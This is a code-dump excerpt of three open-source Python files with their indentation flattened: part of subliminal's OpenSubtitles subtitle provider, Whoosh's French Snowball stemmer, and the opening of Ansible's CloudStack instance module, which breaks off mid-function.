matches |= compute_guess_matches(video, guessit.guess_episode_info(self.movie_release_name + '.mkv'))
# movie
elif isinstance(video, Movie) and self.movie_kind == 'movie':
# year
if video.year and self.movie_year == video.year:
matches.add('year')
# guess
if self.movie_release_name.strip():
matches |= compute_guess_matches(video, guessit.guess_movie_info(self.movie_release_name + '.mkv'))
else:
logger.info('%r is not a valid movie_kind for %r', self.movie_kind, video)
return matches
# hash
if 'opensubtitles' in video.hashes and self.hash == video.hashes['opensubtitles']:
matches.add('hash')
# imdb_id
if video.imdb_id and self.movie_imdb_id == video.imdb_id:
matches.add('imdb_id')
# title
if video.title and self.movie_name.lower() == video.title.lower():
matches.add('title')
return matches
class OpenSubtitlesProvider(Provider):
languages = {babelfish.Language.fromopensubtitles(l) for l in babelfish.language_converters['opensubtitles'].codes}
def __init__(self):
self.server = ServerProxy('http://api.opensubtitles.org/xml-rpc', transport=TimeoutTransport(10))
self.token = None
def initialize(self):
response = checked(self.server.LogIn('', '', 'eng', 'subliminal v%s' % __version__.split('-')[0]))
self.token = response['token']
def terminate(self):
checked(self.server.LogOut(self.token))
self.server.close()
def no_operation(self):
checked(self.server.NoOperation(self.token))
def query(self, languages, hash=None, size=None, imdb_id=None, query=None, season=None, episode=None): # @ReservedAssignment
searches = []
if hash and size:
searches.append({'moviehash': hash, 'moviebytesize': str(size)})
if imdb_id:
searches.append({'imdbid': imdb_id})
if query and season and episode:
searches.append({'query': query, 'season': season, 'episode': episode})
elif query:
searches.append({'query': query})
if not searches:
            raise ValueError('One or more parameters missing')
for search in searches:
search['sublanguageid'] = ','.join(l.opensubtitles for l in languages)
logger.debug('Searching subtitles %r', searches)
response = checked(self.server.SearchSubtitles(self.token, searches))
if not response['data']:
logger.debug('No subtitle found')
return []
return [OpenSubtitlesSubtitle(babelfish.Language.fromopensubtitles(r['SubLanguageID']),
bool(int(r['SubHearingImpaired'])), r['IDSubtitleFile'], r['MatchedBy'],
r['MovieKind'], r['MovieHash'], r['MovieName'], r['MovieReleaseName'],
int(r['MovieYear']) if r['MovieYear'] else None, int(r['IDMovieImdb']),
int(r['SeriesSeason']) if r['SeriesSeason'] else None,
int(r['SeriesEpisode']) if r['SeriesEpisode'] else None, r['SubtitlesLink'])
for r in response['data']]
def list_subtitles(self, video, languages):
query = None
season = None
episode = None
if ('opensubtitles' not in video.hashes or not video.size) and not video.imdb_id:
query = video.name.split(os.sep)[-1]
if isinstance(video, Episode):
query = video.series
season = video.season
episode = video.episode
return self.query(languages, hash=video.hashes.get('opensubtitles'), size=video.size, imdb_id=video.imdb_id,
query=query, season=season, episode=episode)
def download_subtitle(self, subtitle):
response = checked(self.server.DownloadSubtitles(self.token, [subtitle.id]))
if not response['data']:
raise ProviderError('Nothing to download')
subtitle.content = fix_line_endings(zlib.decompress(base64.b64decode(response['data'][0]['data']), 47))
class OpenSubtitlesError(ProviderError):
"""Base class for non-generic :class:`OpenSubtitlesProvider` exceptions"""
class Unauthorized(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '401 Unauthorized'"""
class NoSession(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '406 No session'"""
class DownloadLimitReached(OpenSubtitlesError, DownloadLimitExceeded):
"""Exception raised when status is '407 Download limit reached'"""
class InvalidImdbid(OpenSubtitlesError):
"""Exception raised when status is '413 Invalid ImdbID'"""
class UnknownUserAgent(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '414 Unknown User Agent'"""
class DisabledUserAgent(OpenSubtitlesError, AuthenticationError):
"""Exception raised when status is '415 Disabled user agent'"""
class ServiceUnavailable(OpenSubtitlesError):
"""Exception raised when status is '503 Service Unavailable'"""
def checked(response):
"""Check a response status before returning it
:param response: a response from a XMLRPC call to OpenSubtitles
:return: the response
:raise: :class:`OpenSubtitlesError`
"""
status_code = int(response['status'][:3])
if status_code == 401:
raise Unauthorized
if status_code == 406:
raise NoSession
if status_code == 407:
raise DownloadLimitReached
if status_code == 413:
raise InvalidImdbid
if status_code == 414:
raise UnknownUserAgent
if status_code == 415:
raise DisabledUserAgent
if status_code == 503:
raise ServiceUnavailable
if status_code != 200:
raise OpenSubtitlesError(response['status'])
return response
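# Hedged usage sketch of the provider session lifecycle defined above:
#
#   provider = OpenSubtitlesProvider()
#   provider.initialize()                                   # LogIn, stores token
#   subtitles = provider.query({babelfish.Language('eng')}, query='Inception')
#   provider.terminate()                                    # LogOut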
|
gpl-2.0
|
johankaito/fufuka
|
microblog/old-flask/lib/python2.7/site-packages/whoosh/lang/snowball/french.py
|
96
|
14461
|
from .bases import _StandardStemmer
from whoosh.compat import u
class FrenchStemmer(_StandardStemmer):
"""
The French Snowball stemmer.
:cvar __vowels: The French vowels.
:type __vowels: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
:type __step2a_suffixes: tuple
:cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
:type __step2b_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:note: A detailed description of the French
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/french/stemmer.html
"""
__vowels = u("aeiouy\xE2\xE0\xEB\xE9\xEA\xE8\xEF\xEE\xF4\xFB\xF9")
__step1_suffixes = ('issements', 'issement', 'atrices', 'atrice',
'ateurs', 'ations', 'logies', 'usions',
'utions', 'ements', 'amment', 'emment',
'ances', 'iqUes', 'ismes', 'ables', 'istes',
'ateur', 'ation', 'logie', 'usion', 'ution',
'ences', 'ement', 'euses', 'ments', 'ance',
'iqUe', 'isme', 'able', 'iste', 'ence',
u('it\xE9s'), 'ives', 'eaux', 'euse', 'ment',
'eux', u('it\xE9'), 'ive', 'ifs', 'aux', 'if')
__step2a_suffixes = ('issaIent', 'issantes', 'iraIent', 'issante',
'issants', 'issions', 'irions', 'issais',
'issait', 'issant', 'issent', 'issiez', 'issons',
'irais', 'irait', 'irent', 'iriez', 'irons',
'iront', 'isses', 'issez', u('\xEEmes'),
u('\xEEtes'), 'irai', 'iras', 'irez', 'isse',
'ies', 'ira', u('\xEEt'), 'ie', 'ir', 'is',
'it', 'i')
__step2b_suffixes = ('eraIent', 'assions', 'erions', 'assent',
'assiez', u('\xE8rent'), 'erais', 'erait',
'eriez', 'erons', 'eront', 'aIent', 'antes',
'asses', 'ions', 'erai', 'eras', 'erez',
u('\xE2mes'), u('\xE2tes'), 'ante', 'ants',
'asse', u('\xE9es'), 'era', 'iez', 'ais',
'ait', 'ant', u('\xE9e'), u('\xE9s'), 'er',
'ez', u('\xE2t'), 'ai', 'as', u('\xE9'), 'a')
__step4_suffixes = (u('i\xE8re'), u('I\xE8re'), 'ion', 'ier', 'Ier',
'e', u('\xEB'))
def stem(self, word):
"""
Stem a French word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
step1_success = False
rv_ending_found = False
step2a_success = False
step2b_success = False
# Every occurrence of 'u' after 'q' is put into upper case.
for i in range(1, len(word)):
if word[i - 1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
# Every occurrence of 'y' preceded or
# followed by a vowel is also put into upper case.
for i in range(1, len(word) - 1):
if word[i - 1] in self.__vowels and word[i + 1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i + 1:]))
if word[i - 1] in self.__vowels or word[i + 1] in self.__vowels:
if word[i] == "y":
word = "".join((word[:i], "Y", word[i + 1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self.__rv_french(word, self.__vowels)
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "eaux":
word = word[:-1]
step1_success = True
elif suffix in ("euse", "euses"):
if suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in r1:
word = "".join((word[:-len(suffix)], "eux"))
step1_success = True
elif suffix in ("ement", "ements") and suffix in rv:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "iv" and "iv" in r2:
word = word[:-2]
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
elif word[-3:] == "eus":
if "eus" in r2:
word = word[:-3]
elif "eus" in r1:
word = "".join((word[:-1], "x"))
elif word[-3:] in ("abl", "iqU"):
if "abl" in r2 or "iqU" in r2:
word = word[:-3]
elif word[-3:] in (u("i\xE8r"), u("I\xE8r")):
if u("i\xE8r") in rv or u("I\xE8r") in rv:
word = "".join((word[:-3], "i"))
elif suffix == "amment" and suffix in rv:
word = "".join((word[:-6], "ant"))
rv = "".join((rv[:-6], "ant"))
rv_ending_found = True
elif suffix == "emment" and suffix in rv:
word = "".join((word[:-6], "ent"))
rv_ending_found = True
elif (suffix in ("ment", "ments") and suffix in rv and
not rv.startswith(suffix) and
rv[rv.rindex(suffix) - 1] in self.__vowels):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
rv_ending_found = True
elif suffix == "aux" and suffix in r1:
word = "".join((word[:-2], "l"))
step1_success = True
elif (suffix in ("issement", "issements") and suffix in r1
and word[-len(suffix) - 1] not in self.__vowels):
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("ance", "iqUe", "isme", "able", "iste",
"eux", "ances", "iqUes", "ismes",
"ables", "istes") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("atrice", "ateur", "ation", "atrices",
"ateurs", "ations") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif suffix in ("logie", "logies") and suffix in r2:
word = "".join((word[:-len(suffix)], "log"))
step1_success = True
elif (suffix in ("usion", "ution", "usions", "utions") and
suffix in r2):
word = "".join((word[:-len(suffix)], "u"))
step1_success = True
elif suffix in ("ence", "ences") and suffix in r2:
word = "".join((word[:-len(suffix)], "ent"))
step1_success = True
elif suffix in (u("it\xE9"), u("it\xE9s")) and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-4:] == "abil":
if "abil" in r2:
word = word[:-4]
else:
word = "".join((word[:-2], "l"))
elif word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif word[-2:] == "iv":
if "iv" in r2:
word = word[:-2]
elif (suffix in ("if", "ive", "ifs", "ives") and
suffix in r2):
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
break
# STEP 2a: Verb suffixes beginning 'i'
if not step1_success or rv_ending_found:
for suffix in self.__step2a_suffixes:
if word.endswith(suffix):
if (suffix in rv and len(rv) > len(suffix) and
rv[rv.rindex(suffix) - 1] not in self.__vowels):
word = word[:-len(suffix)]
step2a_success = True
break
# STEP 2b: Other verb suffixes
if not step2a_success:
for suffix in self.__step2b_suffixes:
if rv.endswith(suffix):
if suffix == "ions" and "ions" in r2:
word = word[:-4]
step2b_success = True
elif suffix in ('eraIent', 'erions', u('\xE8rent'),
'erais', 'erait', 'eriez',
'erons', 'eront', 'erai', 'eras',
'erez', u('\xE9es'), 'era', 'iez',
u('\xE9e'), u('\xE9s'), 'er', 'ez',
u('\xE9')):
word = word[:-len(suffix)]
step2b_success = True
elif suffix in ('assions', 'assent', 'assiez',
'aIent', 'antes', 'asses',
u('\xE2mes'), u('\xE2tes'), 'ante',
'ants', 'asse', 'ais', 'ait',
'ant', u('\xE2t'), 'ai', 'as',
'a'):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
step2b_success = True
if rv.endswith("e"):
word = word[:-1]
break
# STEP 3
if step1_success or step2a_success or step2b_success:
if word[-1] == "Y":
word = "".join((word[:-1], "i"))
elif word[-1] == u("\xE7"):
word = "".join((word[:-1], "c"))
# STEP 4: Residual suffixes
else:
if (len(word) >= 2 and word[-1] == "s" and
word[-2] not in u("aiou\xE8s")):
word = word[:-1]
for suffix in self.__step4_suffixes:
if word.endswith(suffix):
if suffix in rv:
if (suffix == "ion" and suffix in r2 and
rv[-4] in "st"):
word = word[:-3]
elif suffix in ("ier", u("i\xE8re"), "Ier",
u("I\xE8re")):
word = "".join((word[:-len(suffix)], "i"))
elif suffix == "e":
word = word[:-1]
elif suffix == u("\xEB") and word[-3:-1] == "gu":
word = word[:-1]
break
# STEP 5: Undouble
if word.endswith(("enn", "onn", "ett", "ell", "eill")):
word = word[:-1]
# STEP 6: Un-accent
for i in range(1, len(word)):
if word[-i] not in self.__vowels:
i += 1
else:
if i != 1 and word[-i] in (u("\xE9"), u("\xE8")):
word = "".join((word[:-i], "e", word[-i + 1:]))
break
word = (word.replace("I", "i")
.replace("U", "u")
.replace("Y", "y"))
return word
def __rv_french(self, word, vowels):
"""
Return the region RV that is used by the French stemmer.
If the word begins with two vowels, RV is the region after
the third letter. Otherwise, it is the region after the first
vowel not at the beginning of the word, or the end of the word
if these positions cannot be found. (Exceptionally, u'par',
u'col' or u'tap' at the beginning of a word is also taken to
define RV as the region to their right.)
:param word: The French word whose region RV is determined.
:type word: str or unicode
:param vowels: The French vowels that are used to determine
the region RV.
:type vowels: unicode
:return: the region RV for the respective French word.
:rtype: unicode
:note: This helper method is invoked by the stem method of
the subclass FrenchStemmer. It is not to be invoked directly!
"""
rv = ""
if len(word) >= 2:
if (word.startswith(("par", "col", "tap")) or
(word[0] in vowels and word[1] in vowels)):
rv = word[3:]
else:
for i in range(1, len(word)):
if word[i] in vowels:
rv = word[i + 1:]
break
return rv
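# Hedged usage sketch:
#
#   stemmer = FrenchStemmer()
#   stemmer.stem("continuera")   # step 2b strips the verb suffix 'era'
#   stemmer.stem("nationaux")    # step 1 rewrites the 'aux' ending to 'al'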
|
apache-2.0
|
nhicher/ansible
|
lib/ansible/modules/cloud/cloudstack/cs_instance.py
|
14
|
38918
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_instance
short_description: Manages instances and virtual machines on Apache CloudStack based clouds.
description:
- Deploy, start, update, scale, restart, restore, stop and destroy instances.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
name:
description:
- Host name of the instance. C(name) can only contain ASCII letters.
- Name will be generated (UUID) by CloudStack if not specified and can not be changed afterwards.
- Either C(name) or C(display_name) is required.
display_name:
description:
- Custom display name of the instances.
- Display name will be set to C(name) if not specified.
- Either C(name) or C(display_name) is required.
group:
description:
      - Group the new instance should be placed in.
state:
description:
- State of the instance.
default: present
choices: [ deployed, started, stopped, restarted, restored, destroyed, expunged, present, absent ]
service_offering:
description:
- Name or id of the service offering of the new instance.
- If not set, first found service offering is used.
  cpu:
    description:
      - The number of CPUs to allocate to the instance, used with custom service offerings.
  cpu_speed:
    description:
      - The clock speed/shares allocated to the instance, used with custom service offerings.
  memory:
    description:
      - The memory allocated to the instance, used with custom service offerings.
template:
description:
- Name, display text or id of the template to be used for creating the new instance.
- Required when using I(state=present).
- Mutually exclusive with C(ISO) option.
iso:
description:
- Name or id of the ISO to be used for creating the new instance.
- Required when using I(state=present).
- Mutually exclusive with C(template) option.
template_filter:
description:
- Name of the filter used to search for the template or iso.
- Used for params C(iso) or C(template) on I(state=present).
- The filter C(all) was added in 2.6.
default: executable
choices: [ all, featured, self, selfexecutable, sharedexecutable, executable, community ]
aliases: [ iso_filter ]
version_added: '2.1'
hypervisor:
description:
      - Name of the hypervisor to be used for creating the new instance.
- Relevant when using I(state=present), but only considered if not set on ISO/template.
- If not set or found on ISO/template, first found hypervisor will be used.
choices: [ KVM, kvm, VMware, vmware, BareMetal, baremetal, XenServer, xenserver, LXC, lxc, HyperV, hyperv, UCS, ucs, OVM, ovm, Simulator, simulator ]
keyboard:
description:
- Keyboard device type for the instance.
choices: [ 'de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us' ]
networks:
description:
- List of networks to use for the new instance.
aliases: [ network ]
ip_address:
description:
      - IPv4 address for the instance's default network during creation.
ip6_address:
description:
      - IPv6 address for the instance's default network.
ip_to_networks:
description:
- "List of mappings in the form I({'network': NetworkName, 'ip': 1.2.3.4})"
- Mutually exclusive with C(networks) option.
aliases: [ ip_to_network ]
disk_offering:
description:
- Name of the disk offering to be used.
disk_size:
description:
      - Disk size in GByte, required if deploying the instance from an ISO.
root_disk_size:
description:
      - Root disk size in GByte, required if deploying the instance with the KVM hypervisor and you want to resize the root disk at startup
        (needs CloudStack >= 4.4, cloud-initramfs-growroot installed and enabled in the template).
security_groups:
description:
      - List of security groups to be applied to the instance.
aliases: [ security_group ]
host:
description:
- Host on which an instance should be deployed or started on.
      - Only considered when I(state=started) or the instance is running.
- Requires root admin privileges.
version_added: 2.6
domain:
description:
- Domain the instance is related to.
account:
description:
- Account the instance is related to.
project:
description:
      - Name of the project the instance is to be deployed in.
zone:
description:
- Name of the zone in which the instance should be deployed.
- If not set, default zone is used.
ssh_key:
description:
- Name of the SSH key to be deployed on the new instance.
affinity_groups:
description:
- Affinity groups names to be applied to the new instance.
aliases: [ affinity_group ]
user_data:
description:
- Optional data (ASCII) that can be sent to the instance upon a successful deployment.
- The data will be automatically base64 encoded.
      - Consider switching to HTTP_POST by using I(CLOUDSTACK_METHOD=post) to raise the HTTP_GET size limit from 2 KB to 32 KB.
force:
description:
- Force stop/start the instance if required to apply changes, otherwise a running instance will not be changed.
type: bool
default: no
allow_root_disk_shrink:
description:
- Enables a volume shrinkage when the new size is smaller than the old one.
type: bool
default: no
version_added: '2.7'
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
- "If you want to delete all tags, set a empty list e.g. I(tags: [])."
aliases: [ tag ]
poll_async:
description:
- Poll async jobs until job has finished.
type: bool
default: yes
details:
description:
- Map to specify custom parameters.
version_added: '2.6'
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# NOTE: Names of offerings and ISOs depending on the CloudStack configuration.
- name: create an instance from an ISO
cs_instance:
name: web-vm-1
iso: Linux Debian 7 64-bit
hypervisor: VMware
project: Integration
zone: ch-zrh-ix-01
service_offering: 1cpu_1gb
disk_offering: PerfPlus Storage
disk_size: 20
networks:
- Server Integration
- Sync Integration
- Storage Integration
delegate_to: localhost
- name: for changing a running instance, use the 'force' parameter
cs_instance:
name: web-vm-1
display_name: web-vm-01.example.com
iso: Linux Debian 7 64-bit
service_offering: 2cpu_2gb
force: yes
delegate_to: localhost
# NOTE: user_data can be used to kickstart the instance using cloud-init yaml config.
- name: create or update an instance on Exoscale's public cloud using display_name
cs_instance:
display_name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ssh_key: [email protected]
tags:
- key: admin
value: john
- key: foo
value: bar
user_data: |
#cloud-config
packages:
- nginx
delegate_to: localhost
- name: create an instance with multiple interfaces specifying the IP addresses
cs_instance:
name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ip_to_networks:
- network: NetworkA
ip: 10.1.1.1
- network: NetworkB
ip: 192.0.2.1
delegate_to: localhost
- name: ensure an instance is stopped
cs_instance:
name: web-vm-1
state: stopped
delegate_to: localhost
- name: ensure an instance is running
cs_instance:
name: web-vm-1
state: started
delegate_to: localhost
- name: remove an instance
cs_instance:
name: web-vm-1
state: absent
delegate_to: localhost
'''
RETURN = '''
---
id:
description: UUID of the instance.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the instance.
returned: success
type: string
sample: web-01
display_name:
description: Display name of the instance.
returned: success
type: string
sample: web-01
group:
  description: Group name the instance is related to.
returned: success
type: string
sample: web
created:
  description: Date the instance was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
password_enabled:
description: True if password setting is enabled.
returned: success
type: boolean
sample: true
password:
description: The password of the instance if exists.
returned: success
type: string
sample: Ge2oe7Do
ssh_key:
description: Name of SSH key deployed to instance.
returned: success
type: string
sample: key@work
domain:
description: Domain the instance is related to.
returned: success
type: string
sample: example domain
account:
description: Account the instance is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the instance is related to.
returned: success
type: string
sample: Production
default_ip:
description: Default IP address of the instance.
returned: success
type: string
sample: 10.23.37.42
default_ip6:
description: Default IPv6 address of the instance.
returned: success
type: string
sample: 2a04:c43:c00:a07:4b4:beff:fe00:74
version_added: '2.6'
public_ip:
  description: Public IP address associated with the instance via static NAT rule.
returned: success
type: string
sample: 1.2.3.4
iso:
description: Name of ISO the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
template:
description: Name of template the instance was deployed with.
returned: success
type: string
sample: Linux Debian 9 64-bit
template_display_text:
description: Display text of template the instance was deployed with.
returned: success
type: string
sample: Linux Debian 9 64-bit 200G Disk (2017-10-08-622866)
version_added: 2.6
service_offering:
description: Name of the service offering the instance has.
returned: success
type: string
sample: 2cpu_2gb
zone:
description: Name of zone the instance is in.
returned: success
type: string
sample: ch-gva-2
state:
description: State of the instance.
returned: success
type: string
sample: Running
security_groups:
description: Security groups the instance is in.
returned: success
type: list
sample: '[ "default" ]'
affinity_groups:
description: Affinity groups the instance is in.
returned: success
type: list
sample: '[ "webservers" ]'
tags:
description: List of resource tags associated with the instance.
returned: success
  type: list
sample: '[ { "key": "foo", "value": "bar" } ]'
hypervisor:
description: Hypervisor related to this instance.
returned: success
type: string
sample: KVM
host:
description: Hostname of hypervisor an instance is running on.
returned: success and instance is running
type: string
sample: host-01.example.com
version_added: 2.6
instance_name:
description: Internal name of the instance (ROOT admin only).
returned: success
type: string
sample: i-44-3992-VM
'''
import base64
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_text
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
CS_HYPERVISORS,
cs_argument_spec,
cs_required_together
)
class AnsibleCloudStackInstance(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackInstance, self).__init__(module)
self.returns = {
'group': 'group',
'hypervisor': 'hypervisor',
'instancename': 'instance_name',
'publicip': 'public_ip',
'passwordenabled': 'password_enabled',
'password': 'password',
'serviceofferingname': 'service_offering',
'isoname': 'iso',
'templatename': 'template',
'templatedisplaytext': 'template_display_text',
'keypair': 'ssh_key',
'hostname': 'host',
}
self.instance = None
self.template = None
self.iso = None
def get_service_offering_id(self):
service_offering = self.module.params.get('service_offering')
service_offerings = self.query_api('listServiceOfferings')
if service_offerings:
if not service_offering:
return service_offerings['serviceoffering'][0]['id']
for s in service_offerings['serviceoffering']:
if service_offering in [s['name'], s['id']]:
return s['id']
self.fail_json(msg="Service offering '%s' not found" % service_offering)
def get_host_id(self):
host_name = self.module.params.get('host')
if not host_name:
return None
args = {
'type': 'routing',
'zoneid': self.get_zone(key='id'),
}
hosts = self.query_api('listHosts', **args)
if hosts:
for h in hosts['host']:
if h['name'] == host_name:
return h['id']
self.fail_json(msg="Host '%s' not found" % host_name)
def get_template_or_iso(self, key=None):
template = self.module.params.get('template')
iso = self.module.params.get('iso')
if not template and not iso:
return None
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'isrecursive': True,
'fetch_list': True,
}
if template:
if self.template:
return self._get_by_key(key, self.template)
rootdisksize = self.module.params.get('root_disk_size')
args['templatefilter'] = self.module.params.get('template_filter')
args['fetch_list'] = True
templates = self.query_api('listTemplates', **args)
if templates:
for t in templates:
if template in [t['displaytext'], t['name'], t['id']]:
if rootdisksize and t['size'] > rootdisksize * 1024 ** 3:
continue
self.template = t
return self._get_by_key(key, self.template)
if rootdisksize:
more_info = " (with size <= %s)" % rootdisksize
else:
more_info = ""
self.module.fail_json(msg="Template '%s' not found%s" % (template, more_info))
elif iso:
if self.iso:
return self._get_by_key(key, self.iso)
args['isofilter'] = self.module.params.get('template_filter')
args['fetch_list'] = True
isos = self.query_api('listIsos', **args)
if isos:
for i in isos:
if iso in [i['displaytext'], i['name'], i['id']]:
self.iso = i
return self._get_by_key(key, self.iso)
self.module.fail_json(msg="ISO '%s' not found" % iso)
def get_instance(self):
instance = self.instance
if not instance:
instance_name = self.get_or_fallback('name', 'display_name')
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'fetch_list': True,
}
# Do not pass zoneid, as the instance name must be unique across zones.
instances = self.query_api('listVirtualMachines', **args)
if instances:
for v in instances:
if instance_name.lower() in [v['name'].lower(), v['displayname'].lower(), v['id']]:
self.instance = v
break
return self.instance
def _get_instance_user_data(self, instance):
# Query the user data if we need to
if 'userdata' in instance:
return instance['userdata']
user_data = ""
if self.get_user_data() is not None and instance.get('id'):
res = self.query_api('getVirtualMachineUserData', virtualmachineid=instance['id'])
user_data = res['virtualmachineuserdata'].get('userdata', "")
return user_data
def get_iptonetwork_mappings(self):
network_mappings = self.module.params.get('ip_to_networks')
if network_mappings is None:
return
if network_mappings and self.module.params.get('networks'):
self.module.fail_json(msg="networks and ip_to_networks are mutually exclusive.")
network_names = [n['network'] for n in network_mappings]
ids = self.get_network_ids(network_names)
res = []
for i, data in enumerate(network_mappings):
res.append({'networkid': ids[i], 'ip': data['ip']})
return res
def get_ssh_keypair(self, key=None, name=None, fail_on_missing=True):
ssh_key_name = name or self.module.params.get('ssh_key')
if ssh_key_name is None:
return
args = {
'domainid': self.get_domain('id'),
'account': self.get_account('name'),
'projectid': self.get_project('id'),
'name': ssh_key_name,
}
ssh_key_pairs = self.query_api('listSSHKeyPairs', **args)
if 'sshkeypair' in ssh_key_pairs:
return self._get_by_key(key=key, my_dict=ssh_key_pairs['sshkeypair'][0])
elif fail_on_missing:
self.module.fail_json(msg="SSH key not found: %s" % ssh_key_name)
def ssh_key_has_changed(self):
ssh_key_name = self.module.params.get('ssh_key')
if ssh_key_name is None:
return False
        # Fails if the keypair given in the param does not exist
param_ssh_key_fp = self.get_ssh_keypair(key='fingerprint')
        # CloudStack 4.5 does return a keypair on the instance even for a nonexistent key.
instance_ssh_key_name = self.instance.get('keypair')
if instance_ssh_key_name is None:
return True
        # Get the fingerprint for the instance's keypair, but do not fail if it does not exist.
instance_ssh_key_fp = self.get_ssh_keypair(key='fingerprint', name=instance_ssh_key_name, fail_on_missing=False)
if not instance_ssh_key_fp:
return True
# Compare fingerprints to ensure the keypair changed
if instance_ssh_key_fp != param_ssh_key_fp:
return True
return False
def security_groups_has_changed(self):
security_groups = self.module.params.get('security_groups')
if security_groups is None:
return False
security_groups = [s.lower() for s in security_groups]
instance_security_groups = self.instance.get('securitygroup') or []
instance_security_group_names = []
for instance_security_group in instance_security_groups:
if instance_security_group['name'].lower() not in security_groups:
return True
else:
instance_security_group_names.append(instance_security_group['name'].lower())
for security_group in security_groups:
if security_group not in instance_security_group_names:
return True
return False
def get_network_ids(self, network_names=None):
if network_names is None:
network_names = self.module.params.get('networks')
if not network_names:
return None
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'fetch_list': True,
}
networks = self.query_api('listNetworks', **args)
if not networks:
self.module.fail_json(msg="No networks available")
network_ids = []
network_displaytexts = []
for network_name in network_names:
for n in networks:
if network_name in [n['displaytext'], n['name'], n['id']]:
network_ids.append(n['id'])
network_displaytexts.append(n['name'])
break
if len(network_ids) != len(network_names):
self.module.fail_json(msg="Could not find all networks, networks list found: %s" % network_displaytexts)
return network_ids
def present_instance(self, start_vm=True):
instance = self.get_instance()
if not instance:
instance = self.deploy_instance(start_vm=start_vm)
else:
instance = self.recover_instance(instance=instance)
instance = self.update_instance(instance=instance, start_vm=start_vm)
# In check mode, we do not necessarily have an instance
if instance:
instance = self.ensure_tags(resource=instance, resource_type='UserVm')
# refresh instance data
self.instance = instance
return instance
def get_user_data(self):
user_data = self.module.params.get('user_data')
if user_data is not None:
user_data = to_text(base64.b64encode(to_bytes(user_data)))
return user_data
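    # Hedged illustration of the base64 round trip performed above:
    #   to_text(base64.b64encode(to_bytes("#cloud-config\n")))
    #   returns 'I2Nsb3VkLWNvbmZpZwo='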
def get_details(self):
details = self.module.params.get('details')
cpu = self.module.params.get('cpu')
cpu_speed = self.module.params.get('cpu_speed')
memory = self.module.params.get('memory')
if all([cpu, cpu_speed, memory]):
            details = details or {}
            details.update({
'cpuNumber': cpu,
'cpuSpeed': cpu_speed,
'memory': memory,
})
return details
def deploy_instance(self, start_vm=True):
self.result['changed'] = True
networkids = self.get_network_ids()
if networkids is not None:
networkids = ','.join(networkids)
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
if not args['templateid']:
self.module.fail_json(msg="Template or ISO is required.")
args['zoneid'] = self.get_zone(key='id')
args['serviceofferingid'] = self.get_service_offering_id()
args['account'] = self.get_account(key='name')
args['domainid'] = self.get_domain(key='id')
args['projectid'] = self.get_project(key='id')
args['diskofferingid'] = self.get_disk_offering(key='id')
args['networkids'] = networkids
args['iptonetworklist'] = self.get_iptonetwork_mappings()
args['userdata'] = self.get_user_data()
args['keyboard'] = self.module.params.get('keyboard')
args['ipaddress'] = self.module.params.get('ip_address')
args['ip6address'] = self.module.params.get('ip6_address')
args['name'] = self.module.params.get('name')
